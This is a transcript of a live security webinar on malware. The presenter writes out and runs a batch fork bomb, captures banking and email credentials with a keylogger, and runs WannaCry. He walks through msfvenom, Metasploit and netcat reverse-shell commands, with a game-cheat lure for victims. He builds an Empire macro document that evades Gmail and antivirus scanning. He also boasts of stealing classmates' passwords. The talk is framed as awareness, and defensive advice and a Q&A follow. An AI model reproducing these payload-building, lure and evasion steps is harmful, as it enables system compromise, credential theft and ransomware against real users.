Let me know, Ashad, when it's ready.
We are live now, actually. Hi, Shikha, we are live now. You can start.
Okay. So, a very good evening, everybody. Hi, Abhijit Singh. So, as the CEO at Kuboter, right, not misspelled or not misconfirated. A good evening, sir. How have you been doing all this while? Am I audible?
I'm a bit nervous about taking this session, though I'm doing perfectly fine.
Okay. Am I audible, sir?
Yeah, you are audible. Actually, I was on mute.
Okay. That's no, not an issue, sir. So, being a cyber space researcher and a security analyst, you have not only focused on the web application security, but also provided your best services in network security and wrapped. So, what's your take on your career when we talk about the cybersecurity and the proceedings about it?
So, though my career was a quite little bit funny when I started, typical Indian parents, they don't like their what to enter into cybersecurity field. So it's something like whenever you talk to your guardians about being a hacker or being a pen tester, they always comment you out like, "Beta, tu jail zarur jayega." So that was how I started in my early ages of the school in terms of cybersecurity.
Okay.
So these days, doing some researches, writing some blogs, taking trainings, all those stuff of the cybersecurity.
Voice is breaking. I think, yeah, it is.
It's
Hello?
perfectly fine now. Is it?
Yeah, absolutely, it's fine.
Yeah. So that was all about my
So, when we
career
talk,
in cybersecurity.
okay. So yeah, I am Shikha, one of the team member of the hackers team, presenting you here on this forum. Well, I'll be talking about my team members with regards to the Hackers Talk, which is a freshly news portal that has come up to reach out to its viewers by providing security in terms of cyber attack and crimes. There have been various warnings spread on the critical vulnerabilities that can be exploited, and our team is here to work on those technologies and provide security awareness through a news portal. So, for the viewers, sir, I would really like you to continue on the session that you have planned to take on. So, this is all up to you, sir, so you can proceed with it.
Okay, so good evening, everyone. Hope you are doing safe in terms of quarantine and this lockdown period. So I wish I could go out, but though it's been lockdown, I can't even go out. And apart from taking these online sessions, so shall we start with today's session, Shikha ma'am? Okay. So today's session is completely all about malwares and security breaches. Sorry. In today's term, major of the corporates face these two terms like malware attacks, security breaches, as well as further social engineering and phishing attacks. The stats says in today's time, out of 100, 80% of the malware, 80% of the breaches are carried out by with this malware attack. So the basic question comes is, what do you mean by this term malware? So malware is a word which is comprised of two words, that is malicious and software, that is malware. Malicious softwares are known as malware, which has a tendency to harm your system. It means any malware which could be of any kind, that is a PDF, XLS, doc, exe, msi, msc, which has a tendency to slow down your system as well as can lead to the data breach of your system, is something what we consider as a malware. Now there are so many different kinds and categories of malware, such as from the childhood onwards we are saying, yeah, मेरे system में एक virus आ गया है. Okay, my system is not working properly, my system has been infected with this term we call in our childhood as virus. So exactly, it's not a virus, it is a malware. Further categories of malwares can be defined, such as there are so many categories. First category is virus. So virus is another kind of malware which we are going to see here. So first category is virus. Okay, sorry. Uh, Virus. Second category is keyloggers. Third category is ransomware. Then there comes this trojans. Then there comes this botnet. Rootkit is another kind of category of malware. Then there comes adware, and finally spywares. So these are the least known categories. Sorry, these are the most known categories. Further types of ransom malwares can be finally defined. So major of the times you might be facing this thing in your system. Your system has been infected with some kind of file. We always say it virus, though it's not a virus. Virus is a kind of malware. It can be anything. It could be a worm. Okay, I forgot to mention here worm. It could be a worm. It could be a trojan. It could be a keylogger. But let's talk about this virus. See, as everything in cyber terms has an abbreviation, has a full form. Virus is also having a full form. The full form of virus is Vital Information Resource Under Siege. Though it's least known to everyone that virus has its own full form. So virus can be anything: a code snippet, a simple bat file, or a simple shell file, or could be executable file or file which is binded behind a JPEG file, MP3 file, or a video file on execution, which makes your system quite slow, will consume your resources, will consume your processor, will consume your RAM, and will eventually make your system slow down. The basic functionality of malware is to attack firstly the C and Windows folder inside C, that is the system files, and then further whole of your hard disk. So we have a small demonstration for this virus, that is to which we call fork bomb. It is the world's smallest virus, containing only 5 characters, that is percentage do 5 percentage 0. So these 5 characters can crash your system, and when put it inside your startup, it's going to execute as soon as your system is going to start. So let me start with the demonstration of this fork bomb. So we are here going to create a small text file and gonna type this thing percentage 05 percentage 0, and we are going to save it as save as, and fork.bat we are going to change from save as type to txt to all files, so that it could be saved as a .bat extension. So it's here. uh, Meanwhile, the definition says it's gonna affect your system resources. See, as per my system says, my CPU resources right now 0, as well as my memory resources 906 megabytes of memory has been consumed till yet, but it's not 100% consumed. So after execution of this fog bomb, you will be seeing the fluctuation in the graph of CPU usage as well as physical memory usage as well. So the basic definition of virus goes: the virus remains dormant unless you or the user or the target doesn't execute it, which means it always needs a human assistance. So let's start it. Let's try to crash my virtual machine, and the terminal has popped up, and check out my CPU usage has went to 100%, whereas my memory is usage is increasing, like it's 1.41 gigs, 42 gigs, 43 gigs, and eventually it's going to be all 1.99 gigs consumption. As you can see the graphs also, the graphs here are saying the same thing: the consumption is increasing. So let's wait for a couple of more seconds for it to pop up with some kind of text or some kind of dialog box. Okay, anytime from now it's gonna, okay, it popped out. It says the application was unable to start correctly. Click OK to close the application. Most of the time, we'll be going with OK. Let's close the application. So as soon as you will click on close or you will click on OK, it's again going to pop up. And the worst part is it's not even going to stop here. So if I try to close my terminal or command prompt, it's again gonna pop up with this same dialog box again and again, over and over. Check out. I'm just clicking it and it's asked me to end process, though it's not going to end process. If I left this virus or this batch file on execution, believe me, it's going to show you blue screen of that is BSOD, which says your physical memory has been dumped and your operating system has been crashed. Most of the time you need to reboot or restart your system forcefully in this case. So if I'm gonna try for a shutdown, it won't let my system to shut down. As per you can see, the usage is 100% and the memory usage is 1.86 gigs. So I'm not able to shut down my system. The best part, if I will be using a physical system, goes with the direct power off. So I'm gonna restart the system from here. Let's see. Let's hopefully let's pray it's going to start. Okay, okay, it's gonna pop up again. So let's okay. The resources has been occupied my virtual machine, and it's going to restart anytime. Let's go with the shutdown. Okay, it says the script is already running a restart of your system. It's gonna take its own time. Okay, perfect. My system has restarted. Sorry. Same goes with my another kind of malware, that is worm. Worm is again a kind of malware which is more similar to the virus but has a little bit function difference in functionality. See, virus doesn't have a power to replicate itself, whereas worm has a power to replicate itself in all the devices and all the drives. It's something like I deployed a worm in my system. As soon as it's gonna find there is a USB drive attached to my system, it's going to copy itself without my permission inside the pen drive. Now pen drive is also affected. Same way, if the same pen drive is going to insert or going to be insert in some other system, so that other system will also get infected by this worm. So same way, it's going to self replicate itself. It is a custom based malware which has a tendency to replicate itself. Now the third category comes this keyloggers. Keyloggers is another category of malware which is very awesome. I personally like to use this keylogger so that I could grab anyone's credentials. So I basically use this keylogger when I was in my graduation and asked my friends and professor to log in to their portals, either for attendance or for security media, social medias. I used to grab their own password. So keylogger is nothing but a malware which is used for grabbing the keystrokes of the person or of the user who entered inside your system or who is using your system. So keylogger is something which is between your hardware and your software, so that if anything is going to be pressed on your physical keyboard, it's going to get captured. It's going to grab the keystrokes of your physical keyboard. So I have a small application of what you call this keylogger, which is installed in my system, and the application name is Pyrex. It is a freeware, it's a free keylogger which you can use and personally deploy in your own system so that you can grab anyone's keystroke. Well, let's check whether it's been started. Oh, my system has started perfectly and in a peaceful manner. So before anything happens, let me close or let me delete this fork.bat so that no one apart from me could execute it. So let's delete it. Okay, I executed the Pyrex keylogger. So if I will be going to any of those banking sites or any of those social media sites, let's say, let's start it in incognito mode. And let's check out what's gonna be the result. Okay, incognito mode has started. Let's say if I'm going to facebook.com, or let's say if I'll be going to this mail.google.com, that is Gmail. Okay, so let it start. So it's gonna take a little bit of time. Okay, my Facebook has been fired up. So I will be entering a fake credential over there. So let's say abhijit.singh@gmail.com, and password be let anything be the password. So I'm not gonna tell you. And as soon as I will click on login, it will be showing me the error page where it's gonna say your password or user ID or password is incorrect. So let it. Meanwhile, let's check out about Gmail. Okay, it's on the verge of starting. So let's say click login again. Okay, it redirected me to the login error page, where it specifies either your username is incorrect or your password is incorrect. Whereas if I'm gonna check out my Spyrix keylogger, that what is my username and what is my password, or what is the username and password of the person who tried to log in into their social media or any kind of application. So there is this keyboard event. Okay, so let me again try it. Let's say abhijit.singh@gmail.com, and the password is this. Click on login. It's again going to pop up with the wrong page because the password is not correct. Whereas if I'm going to check my Spyrix keylogger, sorry, oh my bad. Uh, So can you see it has shown me the username is this thing and the password is QWER123456. So yes, exactly. That's something I typed on my system where it says my username was this abhijit.singh@gmail.com, whereas the password was, which I typed, QWER123456. Now there are people like who went to cafes and ask others, sir, can I please log in into my mailing site or check out my balance? Or let's say there is a target on which a keylogger has already been installed. So what they are going to do is they are going to go with PNB net banking site, and they will be logging with their credentials there. So let's say let's go to PNB e-banking existing user. Whereas okay, let me go with the Gmail's credential as well. abhijit.singh@gmail.com, and the password is again next. It's gonna pop up with the wrong password. Let's go to PNB and it's asking me to enter user ID. So user ID I can give 1233211. Click on continue. It's going to ask me, okay, it says the session has been expired. Not an issue with me. So let's get back to the authentication page again. Let me close this Gmail. Okay, so let it get fired up, and it will be asking me the corporate ID. So that's my corporate ID, for example, and user ID. This thing, hit enter, so that it will be asking me for the password. The password is, let's say, abhijit@1233321. Click on login. So it will be saying a wrong password again. Though if a genuine user is going to enter here, the passwords, the credential, username and password, that will be grabbed by me. Can you see it? It says PNB. The password and user ID is this, and the password again is this IJEET@1233321, which I typed in my keyboard. So banking servers or banking security department came to know that people are using these keyloggers for unauthenticated transaction. So bank came out with this thing which we call on-screen keyboard, whereas the functionality of my keylogger remains up to the physical keyboard on which you type the keys. Whereas when we talk about this virtual keyboard, it is beyond the grabbing power of a keylogger. So let's say I'm gonna enter my password here as TMWNYQE and click on login. So my keylogger is not capable of grabbing a keystrokes which is pressed over my virtual keyboard or on-screen keyboard. Now the next thing says, then what's hacker are going to do? Hackers not only work on the basis of this keylogger, they started using another application to which we call screenshotter. Now screenshotter is something whenever you're going to press a key on your keyboard, either it's a virtual key or your virtual keyboard or your physical keyboard, it's going to grab a screenshot. So there is this functionality in our what we call Spyrix keylogger. It's gonna give you each and every screenshot for any key pressed here. Can you see here it is there? It's there at the very bottom. Screenshot has been captured. If I open the screenshot, it's going to show me something like this, that here's your screenshot on which a user has pressed a key. So that's another implementation. Now banks again came to know that something like key loggers and screenshotters are available with the hackers. So bank came out with another functionality which is implemented by very few banks. One of them is HDFC banks. So they have implemented a key scrambler there. That is, whenever you are going to press any key on a virtual keyboard, the whole of the key are going to convert into asterisk, and your keys are going to shuffle over your virtual keyboard. So let me show you this thing as well. Continue to net banking. So let's say user ID be 123321, continue, and let me give a little bit zoom in. So it says for password I am using virtual keyboard, and let's say my password is QWERTY, QWERTY. So for that I will be searching the word Q. Okay, it's here. As long as you're gonna press it, it's going to convert into asterisk. Release it, your whole keyboard is shuffled. Next you need to search this W word, press it, whole keyboard is going to convert into asterisk. Release it, whole keyboard is going to shuffle. So now the screenshotters are not going to work here, since screenshotters are going to work when you're going to press any key. So that's the best example of a keylogger which I can tell you. Apart from it, moving towards our next kind of malware is a ransomware. These are perfect for a hacker who is going to interrupt or who wants to earn a lot of money via illegal way. But make sure you don't run into these kind of work deploying a ransomware in someone's system. So there are so many ransomware which we face in these past 3 to 4 years. The most famous was WannaCry ransomware. Then there was Patia ransomware. Then there was not Patia ransomware. Then there comes this Bad Rabbit. Then there comes this N ransomware. Apart from N ransomware, we got Dharma. Then we got Crab. And during this lockdown, during this pandemic of COVID-19, we have got another ransomware, that is COVID Locker. Now, this COVID Locker claims to give you information, a live stat information about a corona disease spreading, how many cases are there, which state is having how many number of deaths and how many number of cases over your Android phone. So it will ask you to download a COVID etc a name file application and install it in your system. As soon as you're going to launch that system, it will be encrypting all of your file. And the best part is, in all of the above ransomwares, there was a dynamic ransom you need to pay in the form of Bitcoin. But in COVID a locker, they are asking only 100 USD, that is $100 of money of USG, and you need to pay if you want to use your device again. That's a new form of this thing, ransomware. So I have a ransomware demonstration, that is WannaCry, which is based upon Microsoft operating system. That is, it's going to work only for Microsoft operating system. Before launching a ransomware or before working with the ransomware, I want all of you to make sure of two things. The first thing is, make sure you create a snapshot or a restore point of your machine so that you could revert back to its original position. Second thing which I want you to do while performing experiments with or testing with ransomware is make your system disconnect from every other network or every other system inside the network, so that none of other systems in the network are going to get affected by this ransomware. So malwares always do have a tendency to reach out to the systems which are there inside a network. So let me execute this WannaCry file. I always do carry these files, like I do have Patia, I do have WannaCry. So let's execute this WannaCry. It's going to encrypt all of my system with a algorithm, and at the end it's going to ask me certain to pay certain amount of money. So can you see files are being given with an extension t.wnry, s.wnry, c.wnry. So if you're going to open any of those application, let's say MSG, it will be open and check out every file inside there has been encrypted with WannaCry ransomware. Now let's restart the system. Sometimes we see says that okay, our system has been infected. Who knows, after restarting it's going to work perfectly fine. So let's restart the system and see what's going to happen with my system, whether I am able to continue working with my system which is infected by this WannaCry ransomware, or it's going to keep the files encrypted. So let it restart. Let's see. Okay, my each and every file here has been encrypted with WannaCry ransomware. Check out each and every file. It's not going to let me use any of those files or applications which are there inside my system. Open any of those files, you will see either the folder is empty or the files has been decrypted via this WannaCry ransomware. So that's how your WannaCry works. So they basically ask you for a money to be paid. So they ask for the money in forms of Bitcoin. So these days Bitcoin value is quite increasing. Let me show you Bitcoin to INR. Morning it was like 6 lakh something. Okay, it increased a little bit. So the value of one Bitcoin is 6 lakh 65 rupees, 585 rupees and 5 6 paise. So that much amount of money is equivalent to just one Bitcoin. Now moving towards our next kind of, okay, let me restore my system so that I could proceed further with further demos. So that's the benefit of using a restore point or creating a snapshot, so that my system is like before when we deployed WannaCry ransomware. Moving towards my personally favorite malware is this Trojan. Now Trojan is a kind of malware which will give you a connection, a reverse connection from the system. So for this demonstration, I'm not going to use Windows-based services. It's quite a little bit old. So we'll be using another framework, Metasploit framework, for performing example of Trojan. So let's create Trojan from MSF Venom. Let's say MSF Venom space -p. So there is a whole list of payloads which you can create. So I will be going with Windows/shell underscore reverse underscore TCP, and I will be specifying on which port it's going to work. So it's something I will be saying L port equals to 1337, and L host here it will be your system's IP address. So let's go with ifconfig, and my IP address or the attacker's IP address is 130. So I will be specifying here 192.168.98.130. I'm saying a file format of executable, and I am saving it on my desktop, root desktop, and let's say okay, let's give it a name, shaktiman.exe. And not long it's gonna take, so it will be creating a shaktiman.exe file on my desktop. So let it get complete. Come on, it should not take that much time. Okay, the creation of Trojan has been completed. So there, here we have got Shaktiman.exe. Now I can use two things for getting a reverse connection. The next thing is I need to send this Shaktiman.exe to my target system via one way or another way. So first of all, let's send it to our Windows system, that is my target system or the system of the victim. So paste item. Here it will be shaktiman.exe. Let's copy it and let's paste it inside my Windows system. And before executing the Shaktiman.exe, you need to start your Metasploit framework so that you could listen to the reverse connection of that Shaktiman.exe. So there are basically two ways by which you can listen to a Trojan in your system. First is by using the same framework which you are using, that is Metasploit framework, and second framework is Netcat, that is NC. So we'll be using both. I'll be showing you how to use both of the things for getting a reverse shell or reverse connection from this. So next thing is, let's start up with the handler. So use multi handler, and in that multi handler I need to specify, that is set payload windows slash shell underscore reverse underscore TCP. Now we need to check out what are the options here. So there are so many different options. That is, you need to specify L port. L port means it's a IP address of the attacker. Okay, IP address of the attacker as in the person who is attacking. So let's say set L host 192.168.98.130. That is my own IP address. And remember, in the command where we created our payload, we specified a L port. So we need to set the same L port here. So let's go with set L port 1337, hit enter. Now let's again go ahead and check with the options. So it's something completed. Now if you want to see some advanced option, you can always go with show advanced, and it's going to show you more advanced option as compared to these options. So anyways, we don't need to set these advanced options, we need to listen from the payload. So let's type the magical word exploit, hit enter. As soon as the user or the target is going to open shaktiman.exe, it's something I'm not going to send him as shaktiman.exe. I will be using a kind of social engineering. Like these days all of you are playing PUBG, which is quite commonly used uh, game, mobile game. So you can always say to the person like, I know the target is a PUBG player, so I can always say, man, it is a god mode application which I found, and no one can kill you. You will always have a chicken dinner whenever you are going to play PUBG. Quite interesting. So as soon as the person is going to execute it, you will be getting the access of the system. So that's how you can always grab the system's access of the person. Let's say IP config, it is showing me as the configuration of my Windows system. Okay, now if I'm just gonna type this thing dir, so I will be getting the data which is kept on my Windows system, that is on the desktop. Let's say I'm gonna type who am I, it's going to say I am working as a Lucifer. So if you're gonna check there, you will find each and every file like pwdemp7 and Patia is there. So you can always check out for the proof Patia is here, PW Dump 7 is there, even though Shaktiman.exe is there. So that's a one way you can grab someone's access in a reverse shell by using Metasploit framework. Whereas when we talk about this another tool, that is Netcat is there, which you can grab so another reverse shell. So let's say netcat space hyphen LVP. L stands for listening, V stands for maximum verbose, and P stands for a port number. Remember, when we created our Trojan, we specified a port number as 1337. So let's say 1337 and hit enter. So this sentence says whatever connection we are getting on my IP or my system's IP, which is coming via up to a port number 1337, it's going to start a session, it's going to start listening to that system. So let's say, let's again execute this Shaktiman.exe. As soon as someone is going to click, I will be getting the system's access again. So that's how hacker perform these kind of stuff. They're going to send you certain kind of files with a greedy attribute, like download our application, install our application, and you will be getting XYZ amount of discount. So जब भी हम उनके डाउनलोड किए हुए एप्लीकेशन को एग्जीक्यूट करेंगे, whenever you're going to execute the application which we downloaded from the source given by another person, so there is a possibility it could be a Trojan, so which will give you or we give your systems access to the hacker itself. So major of the Trojans were used to transferred via torrent services. So beware, if you're still using any kind of torrent, make sure you don't download or don't accidentally trigger any kind of malware which is there kept inside a file, hidden file inside a Trojan. Now let's talk about this thing according to a corporate point of view. In corporate, recently I have heard many of those corporates are targeted by hackers just by sending a text file, just by sending an email which contains a PDF or which contains a text. So we also have a small demonstration regarding these kind of text files which are there, which are quietly unknown, or what we call unidentified or fully undetectable by malware. Moreover, you can send these kind of files via Gmail. So there is this tool leaked from the NSA. In 2016 and 17, there was a leak that to which we call Vault 7 Year Zero. This Vault 7 Year Zero was NSA based leak where it was saying NSA is using your smart devices as their covert microphones and for gathering other information. So in the leak, it's been said Year Zero introduced the scope and direction of CIA's global covert hacking program, which includes a wide range of US and European company products like Apple iPhone, Google's Android, and Microsoft Windows, and even Samsung TV, which are turned into covert microphones. So believe me, if you are using these products, though everyone is using these kind of products, but their devices are working as a microphone for NSA, that is National Security Agency, and CIA for American agencies. So always make sure you don't use these kind of phones and these kind of devices. Although we all are using Apple's iPhone, apart from it I'm using Apple's Mac. Even we all are using Android, which is of Google again. Most of the global corporates are using Microsoft operating system as their base system. So there was this tool, a small tool to which we call Empire, and by Empire you can trigger these kind of exploits, these kind of Trojans. So let me show you and let me give you another demonstration, my last demonstration for this thing. So I let me turn on my another virtual machine. So meanwhile, let's start with the Empire framework, which is a better version of Metasploit framework and more stable and more persistent as compared to Metasploit framework. So let's say CD tools. I have this Empire, and in that I have dot slash Empire. So that's how your interface of Empire looks like. That's like, okay, welcome to Empire. Does it looks like the Star Wars Jedi theme? at the starting. So we need to start up with a listener here. So let's say, how do we have any listeners started or not? So just gonna type listeners, and it says no listener currently active. So let's use listener, and in listeners we have got all these listeners which we are going to use. Let's go ahead with http, and it started with listener which is of http. And again, let's check out for info there, and it's going to show you that these are the information which is there. So the name it's given here is http, and again, host is there, that is my own ip address, 192.168.98.130, listening on port number 80. Now let's execute this listener, and it says listener started. So let's go back to the main machine, and here you are able to see one listener currently active. Now it's time to create a macro, it's time to use a stager. So let's say listeners, okay, this listener is active, use stager. And again, there are you gonna press tab key, you will be seeing so many stagers, that is on the basis of which you can create a payload. So there is this windows macro, I always prefer to use macro. And again, after that you need to specify a listener name, that is my http as a listener. Go with info, and it's going to show you what kind of data it's going to take and what kind of output it's going to generate, that is what are the options. So it says output file is there in temp macro. So rather than going with temp macro, you can change the output file. So let's say set out file to root desktop, and let's say macro. Inside this macro file we will be getting our malicious payload, which we will be embedding inside a text file or a doc file. And let's type execute. So it says output has been written to this macro. So let's go ahead and check out. Okay, it's there macro. So what we need to do is we need to open this file. As soon as this file is going to open, you will be seeing a vb code which is having such shell code in it, that is alphanumeric shell code. And we need to copy this shell code and create a doc file here. So let's say Windows 7. So I don't have a registered license version for this thing, Windows Microsoft. So I'm using a small version of it. So let's go with the macro, view macro, and delete every other macro which is there inside. And let's give it a name. Let's give it the hacker talk as the name. Click on create. So whole new script is going to open. So in that script, what you need to do is you need to paste the macro code which we obtained here. So as soon as you're going to paste it, save it via control s, close it, close it. And here is your text file. You can give anything here. Let's say here is the stat of malware attacks in the corporate, and anything you can give whatever you like to give. And let's save it on desktop. So let's go ahead with save as. Let's give it with this thing, word 93 to 97 to 2003 document with which is macro enabled. And let's save it on desktop itself. So let's give it the name, the hackers talk. You can keep the names different if you want to, like, so I'm not getting any kind of name in my mind, so I'm giving it the hackers talk. And it is created on my desktop. Can you, it's visible here, the hackers talk. So if I wanted to send over a mail, your gmail cannot even detect these kind of macro exploits. So let me send to myself on gmail, and let's check out whether this macro exploit is going to get detected or not. Okay, come on, load it. Meanwhile, in the terminal, let's go back to our main screen where it says listener currently active. That is, your listener is currently active here. And whenever someone is going to execute or start up that file, your macro is definitely going to get execute. And let's compose the data here, compose a mail here. So, okay, let's start it up. Hmm. Okay, it's taking a time. Since it's a virtual system, it's going to take a little bit amount of time as compared to your main system. So let me use the main system. Let me copy this macro enabled document, that is the hacker stock, to my main system, and let me upload send it via some mail. So let's say paste item, and let's start it up, and let's compose it. Okay, it's taking a time. Okay, yeah, so it's here. I'm sending it to myself, saying again my email ID. Let's say regarding stats or financial stats of the company, and let's say hi team PFA. Please find the attachments, and you can upload your file here. That is the hackertalk.doc. Upload it, and the best part is your Gmail is not even going to detect checkout. It's not saying that it is a malware, whereas it's sent successfully. If I'm again gonna upload a file there, that is Shaktiman, which we created as a exe file, so it's going to detect it and will not let me upload this Shaktiman.exe. It says virus detected for Shaktiman.exe, whereas our doc file didn't even got captured or didn't got exploited or uh, caught or got restricted by a Gmail. So what we need to do is, as soon as someone is going to open it, since I again told you it is my trial version of Microsoft Office. So, if it is a full-fledged version, you don't need to manually execute the macro. But since it is a trial version, I don't have the functionality for running the macro. So let's run the macro. As soon as you will be running the macro, you will be getting okay, listeners here. So as soon as you will be running this macro here, you will be getting an active connection. Okay, it's not showing me active connection. It's supposed to show it. Let's give it a dry run here again. View macro, and let's click on run the macro, and okay, that's my bad. Let's go to edit again. Let's again copy paste the whole code. Copy it, and let's delete it, and let's paste the same code again. Let's save it, and let's give it a run here. Let's check out. Okay, it's not showing, though it was supposed to give me listener has started a session, and you can directly interact with this thing with the listener. I don't know why it's not giving me a reverse shell here. Anyways, uh, this kind of modules or this kind of files are sent in a corporate environment where none of those best antivirus can detect it. So I guess it's not giving me any kind of listener here. Though my listener is already started. Anyways, that was from my behalf from malware session and security breaches. The major points which I want to conclude this session is that please, if you are downloading anything, always make sure to upload it on a website like virustotal.com, so that it could give you a whole scenario whether the file is a genuine file or not. Second thing, always try to run the application inside a virtual system. Okay, so let's upload the file here. That the file we created, that is the hackerstock.com, and confirm the upload. So it's not going to get detected by any of those antiviruses. Okay, let me check out one thing. Okay, sorry, that's why I didn't get the session there. So let me convert from bridge to NAT and CMD IP config. Okay, I got it. So let's execute the file again and check out whether we are going to get the reverse shell of it. Let's say let's run it and check out. It says sending PowerShell stager, and yes, we are able to grab a reverse shell there. So let's go to the main screen and let's go to listeners. Yes, we are able to grab it. So I can interact. So for doing the interaction, you can always go with the help and this thing. Go to main. So interact space. You can always give it. Okay, agent name. Okay, agent hasn't specified here. So let me again go with this macro running thing. Macro, view macros. Let's run it. And yes, we are able to grab here. Yeah, now successfully we are able to grab a reverse shell from here. And let's check out the main screen and see what it's going to say to us. Listeners, it's active, and check out the one agent has been currently active. You can now go with the interact command and give the name of the agent here. Now I have successfully interacted with the session. You can always go with the command dir. It says it's running at the back end, and it soon will display the whole data here, and it's going to take a little bit amount of time since it is persistent as in it's not going to get depleted here. Check out, I did the dir and I got the result here. If I'm going to do pwd command, so it will be showing me I am inside C Windows System 32. Let's navigate back a little bit and again do pwd. It will be showing me the path I am in C Windows. If I'm again going back to the same thing, that is cd space dot dot, I'm gonna do pwd. It will again show me now I am in C drive. So let's check out the data of C drive, that is dir. You will be see recycle.bin is there, boot is there, documents and setting is there. There is this another folder with the name of hello, and other folders are still there. Okay, for proof that we successfully got entered there, you can always go ahead and check out there inside C drive. You will be getting all those folders. So let's say let's navigate to cd hello pwd, and you will be seeing we are inside hello, and we can create a folder. For example, let's say, let me show you, this hello folder is completely empty. It is having a file hi. Let's say we want to make another directory mkdir hacked. So Okay, it's not letting me to create. So let's say we can create another file, echo. Uh, your system has been compromised and inside a hack.txt file. Okay, I am not able to create a file there, but anyways, we are able to successfully get access of the system. And the best part about this thing is, if you're gonna check my firewall is up here. We haven't turned down my firewall. It says it's connected and it's on. You will be getting a connection since your firewall is up here. So that's how your corporates are getting breached. There are so many sustainable applications and frameworks in the market which are there, which will help you in exploiting a system, which will help you in exploiting the system when your security things are up, like your firewall is up, your antivirus is up, and none of the file or none of the antivirus says it is a ransom or it's a Trojan, it's a malware. If you again go back and check out with this thing, Shaktiman.exe, and let's upload that Shaktiman.exe and check out major of those antivirus available in the market will detect it as a Trojan or MSF payload or anything. But whereas when we talk about this macro exploit, none of those antivirus were able to detect it, and we were able to grab a reverse shell on it. So always make sure you do check each and everything before you download, and always go with the security precautions, like to execute everything inside your system in a virtual system. And always make sure, if you are downloading anything and you want to make sure none of the things inside your system is creating a backdoor or creating a connection, just open your terminal as a administrator and type this command, that is netchat-b. So it will tell you what are the applications which are using a connection. So you need to analyze a little bit, so that if there is any application which is making a connection, is existing in your system or not. So that was from my side for today's session of malware and security breaches. I hope you might like the session. So if you have any kind of query, please drop down inside the chat box or the comment box on your screen. Thank you,
Yes,
guys.
yes, I think it was a great honor to have you with us in the session. And yes, some of our viewers did have queries, which I would really like to put across in front of you. It was about the recommendation to look for when
They are talking about is, there are so many anti-malwares which are under what we call working and checking out the analysis. So every day, let's say if I want to analyze a malware, rather than going for their hash side, that is every malware, every entity or internet has a signature, digital signature, to which we call hashes. So people, most of the antivirus go with detecting the hash of a signature of a malware. So most of the time it's quite easy for me to change the hash. So for example, let me show you this small example of it. Let me copy this thing and convert it into a hash. There is this miraclesalad.com. Okay, sorry, miraclesalad.com. So you can use this SHA1 or SHA256 hash generator. I'm saying create multiple file as, sorry. Okay, so I'm pasting the whole code here. So it is giving me this hash. Okay, so it is by default hash. I can change the hash by changing a variable. You see, variable name is something which is not of that much usage. So instead of JD, I'm just gonna type hello, and my hash will get changed. So every JD I'm gonna type and convert it into hello, its hash is going to pop out in a different way. So the best way, to the bright side on working on those anti-malware, is to work on the behavior of this thing. So there are so many files, so many attributes which are there, so many applications are there. Like there is this Yara rules which are available, which helps in working, but they are not as efficient as they seem. So you need to work upon the research part, that how things are working, how behavior of a malware is working.
Okay. Also, with a quote that is said that no protection is absolute. So, what are those well designed protective tools that can actually
Pardon, ma'am, can you please repeat again? Your voice got interrupted a bit. Ma'am, you there? Shikha, ma'am.
सर सेक्शन को दो आप वो उसका पावर कर दो
Hello.
yeah.
Yeah. Sorry. Due to the network problem, your voice got interrupted. So can you
Yeah, I
please?
think there was. Yes, absolutely. Yeah, my question was when we know that there are no protection which is absolute, that's a quote which is basically given when it comes to the security, the cyber security. So, what are those well designed protective tools that can actually make one's computer safe?
See, there isn't, as you said, the code says no security
No
thing is
protection is absolute.
no,
Yeah.
protection is not absolute. The thing is, there are three misconceptions which everyone thinks. The first misconception is if I'm having a good IPS IDS, I'm secure. That is again wrong. If anyone says the second misconception is if there is a good firewall, I am quite secure. That is again wrong. And the third says if I am using a good antivirus or I am using a HTTPS rather than HTTP, we are secure. These are like misconceptions. So Facebook uses almost 16 firewalls, IPS IDS to keep themselves secure. So they know just usage of one firewall is not enough. Whereas everyone of us might have heard about the securest building on this planet, that is Pentagon.
Right.
Pentagon is using almost 24 to 26 IPS IDS firewalls and anti-malwares. So that's true. No security product is absolute. Protection is not absolute. If you're asking me what are the things, it's quite common and generous. General. The thing is, we should be aware. Like we are getting a mail. In a mail, you need to check out the headers from where you are getting mail, whether the mail is genuine or not. That's the first security point. Never go ahead and download any kind of application from unknown and untrusted site. Third, if you are saying I want to install some applications in my system, yes, do not install a single application. Do not rely on a single application. Though these days products are coming inside market which give you multiple things in a single entity. Like corporate always go with UTM system, that is Unified Threat Management System, which gives you a lot of things. Like it is a firewall inside, it is anti-malware inside, there is IPS IDS, anti-phishing, anti-spamming things inside. So depending upon just one application is not enough. So you need to depend on multiple and various application to make sure you are absolute. There was this conference I went upon where someone asked another person, another speaker, that sir, can you please tell me how you can be secure in today's era? The person said there are two things you can do for keeping yourself secure. First is never buy any digital product, like never buy a laptop, never buy a smartphone. Second thing is if you anyhow purchase all those things like laptop or a smartphone, just keep them inside a safe and go to Himalaya. So if you are asking me what is absolute security, no, there isn't any absolute security, ma'am.
Sure. So, thank you so much, sir. We are really honored to have you on this session. So that was really a brief discussion and a great session which we had right now with regards to the cybersecurity, also with the malware software, and you really gave us a clear idea about it. So we're really honored to have you. Thank you so much with us. So we'll stay tuned for our viewers. We have Mr. Anshul Pandey next coming up after this session. So for the viewers, stay tuned. Thank you so much.
Sure, ma'am. Sure. Pleasure is all mine, ma'am.
Thank you.
Hi Shikha, actually Anshul will not be joining here. He will be live in another stream. So we are going to end this stream right now.